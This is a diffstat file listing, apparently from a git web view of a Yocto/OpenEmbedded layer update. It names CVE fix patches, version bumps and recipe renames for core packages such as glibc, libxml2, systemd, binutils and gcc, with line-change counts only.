-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch55
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch290
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch89
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch255
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch154
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch103
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch210
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch417
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch113
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch80
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch396
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch394
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch97
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb39
-rw-r--r--meta/recipes-core/glib-2.0/glib.inc6
-rw-r--r--meta/recipes-core/glib-networking/glib-networking_2.62.4.bb2
-rw-r--r--meta/recipes-core/glibc/cross-localedef-native_2.31.bb2
-rw-r--r--meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--meta/recipes-core/glibc/glibc.inc4
-rw-r--r--meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch66
-rw-r--r--meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch191
-rw-r--r--meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch206
-rw-r--r--meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch144
-rw-r--r--meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch180
-rw-r--r--meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch56
-rw-r--r--meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch124
-rw-r--r--meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch276
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2020-29573.patch128
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch68
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch73
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-38604.patch41
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-0687.patch82
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4813.patch986
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4911.patch63
-rw-r--r--meta/recipes-core/glibc/glibc/check-test-wrapper11
-rw-r--r--meta/recipes-core/glibc/glibc_2.31.bb50
-rw-r--r--meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch2
-rw-r--r--meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch65
-rw-r--r--meta/recipes-core/ifupdown/ifupdown_0.8.35.bb4
-rw-r--r--meta/recipes-core/images/build-appliance-image_15.0.0.bb10
-rw-r--r--meta/recipes-core/initrdscripts/files/init-install-efi.sh5
-rwxr-xr-xmeta/recipes-core/initrdscripts/initramfs-framework/finish9
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/rootfs2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/setup-live2
-rwxr-xr-xmeta/recipes-core/initscripts/initscripts-1.0/checkroot.sh2
-rw-r--r--meta/recipes-core/initscripts/initscripts_1.0.bb2
-rw-r--r--meta/recipes-core/kbd/kbd_2.2.0.bb1
-rw-r--r--meta/recipes-core/libxcrypt/libxcrypt.inc2
-rw-r--r--meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch813
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch89
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch35
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch112
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch73
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch98
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch204
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch348
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch623
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch104
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch79
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch42
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch36
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch71
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch44
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch80
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch38
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch33
-rw-r--r--meta/recipes-core/libxml/libxml2/runtest.patch45
-rw-r--r--meta/recipes-core/libxml/libxml2_2.9.10.bb46
-rw-r--r--meta/recipes-core/meta/buildtools-extended-tarball.bb13
-rw-r--r--meta/recipes-core/meta/buildtools-tarball.bb2
-rw-r--r--meta/recipes-core/meta/cve-update-db-native.bb188
-rw-r--r--meta/recipes-core/meta/cve-update-nvd2-native.bb372
-rw-r--r--meta/recipes-core/musl/libucontext_git.bb2
-rw-r--r--meta/recipes-core/musl/musl-obstack.bb2
-rw-r--r--meta/recipes-core/musl/musl-utils.bb2
-rw-r--r--meta/recipes-core/musl/musl_git.bb2
-rw-r--r--meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch29
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2021-39537.patch30
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2022-29458.patch135
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-29491.patch45
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-50495.patch79
-rw-r--r--meta/recipes-core/ncurses/files/config.cache4
-rw-r--r--meta/recipes-core/ncurses/ncurses.inc12
-rw-r--r--meta/recipes-core/ncurses/ncurses_6.2.bb8
-rw-r--r--meta/recipes-core/os-release/os-release.bb4
-rw-r--r--meta/recipes-core/ovmf/ovmf-shell-image.bb1
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch49
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch53
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch41
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch51
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch32
-rw-r--r--meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch20
-rw-r--r--meta/recipes-core/ovmf/ovmf_git.bb16
-rw-r--r--meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb1
-rw-r--r--meta/recipes-core/psplash/files/psplash-start.service1
-rw-r--r--meta/recipes-core/psplash/files/psplash-systemd.service1
-rw-r--r--meta/recipes-core/psplash/psplash_git.bb2
-rw-r--r--meta/recipes-core/systemd/systemd-boot_244.5.bb (renamed from meta/recipes-core/systemd/systemd-boot_244.3.bb)0
-rw-r--r--meta/recipes-core/systemd/systemd-conf/wired.network1
-rw-r--r--meta/recipes-core/systemd/systemd-conf_244.3.bb3
-rwxr-xr-xmeta/recipes-core/systemd/systemd-systemctl/systemctl22
-rw-r--r--meta/recipes-core/systemd/systemd.inc4
-rw-r--r--meta/recipes-core/systemd/systemd/00-create-volatile.conf1
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2018-21029.patch120
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13529.patch42
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13776.patch96
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-33910.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch65
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch101
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch266
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2022-3821.patch47
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch115
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch264
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch182
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch32
-rw-r--r--meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch78
-rw-r--r--meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch285
-rw-r--r--meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch50
-rw-r--r--meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch278
-rw-r--r--meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch318
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-pager.sh7
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch30
-rw-r--r--meta/recipes-core/systemd/systemd_244.5.bb (renamed from meta/recipes-core/systemd/systemd_244.3.bb)40
-rwxr-xr-xmeta/recipes-core/sysvinit/sysvinit/rc2
-rw-r--r--meta/recipes-core/udev/eudev/init2
-rw-r--r--meta/recipes-core/udev/eudev_3.2.9.bb1
-rw-r--r--meta/recipes-core/update-rc.d/update-rc.d_0.8.bb4
-rw-r--r--meta/recipes-core/util-linux/util-linux.inc7
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch33
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch139
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch226
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch161
-rw-r--r--meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch270
-rw-r--r--meta/recipes-core/util-linux/util-linux_2.35.1.bb5
-rw-r--r--meta/recipes-core/volatile-binds/files/volatile-binds.service.in2
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2018-25032.patch347
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2022-37434.patch44
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2023-45853.patch40
-rw-r--r--meta/recipes-core/zlib/zlib_1.2.11.bb6
-rw-r--r--meta/recipes-devtools/apt/apt.inc6
-rw-r--r--meta/recipes-devtools/apt/apt/CVE-2020-3810.patch174
-rw-r--r--meta/recipes-devtools/binutils/binutils-2.34.inc20
-rw-r--r--meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch257
-rw-r--r--meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch26
-rw-r--r--meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch61
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch204
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch572
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch83
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch183
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch35
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch37
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch64
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch34
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch31
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch57
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch49
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch530
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch149
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch68
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb (renamed from meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb)8
-rw-r--r--meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb4
-rw-r--r--meta/recipes-devtools/build-compare/build-compare_git.bb2
-rw-r--r--meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake-native_3.16.5.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch255
-rw-r--r--meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake9
-rw-r--r--meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb2
-rw-r--r--meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb2
-rw-r--r--meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb3
-rw-r--r--meta/recipes-devtools/devel-config/distcc-config.bb1
-rw-r--r--meta/recipes-devtools/diffstat/diffstat_1.63.bb4
-rw-r--r--meta/recipes-devtools/distcc/distcc_3.3.3.bb3
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch236
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch198
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch62
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode_3.2.bb4
-rw-r--r--meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch60
-rw-r--r--meta/recipes-devtools/dnf/dnf_4.2.2.bb4
-rw-r--r--meta/recipes-devtools/dosfstools/dosfstools_4.1.bb2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg.inc2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg_1.19.8.bb (renamed from meta/recipes-devtools/dpkg/dpkg_1.19.7.bb)4
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb1
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c13
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs.inc4
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch49
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch41
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch57
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch42
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch22
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch76
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest1
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb (renamed from meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb)18
-rw-r--r--meta/recipes-devtools/elfutils/elfutils_0.178.bb2
-rw-r--r--meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch72
-rw-r--r--meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb1
-rw-r--r--meta/recipes-devtools/file/file_5.38.bb2
-rw-r--r--meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch32
-rw-r--r--meta/recipes-devtools/flex/flex/check-funcs.patch67
-rw-r--r--meta/recipes-devtools/flex/flex_2.6.4.bb7
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch204
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch600
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch659
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5.inc (renamed from meta/recipes-devtools/gcc/gcc-9.3.inc)18
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch44
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch)6
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch1506
-rw-r--r--meta/recipes-devtools/gcc/gcc-common.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-runtime_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-runtime_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-shared-source.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-source.inc1
-rw-r--r--meta/recipes-devtools/gcc/gcc-source_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-source_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc-initial_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc-initial_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc_9.3.bb)0
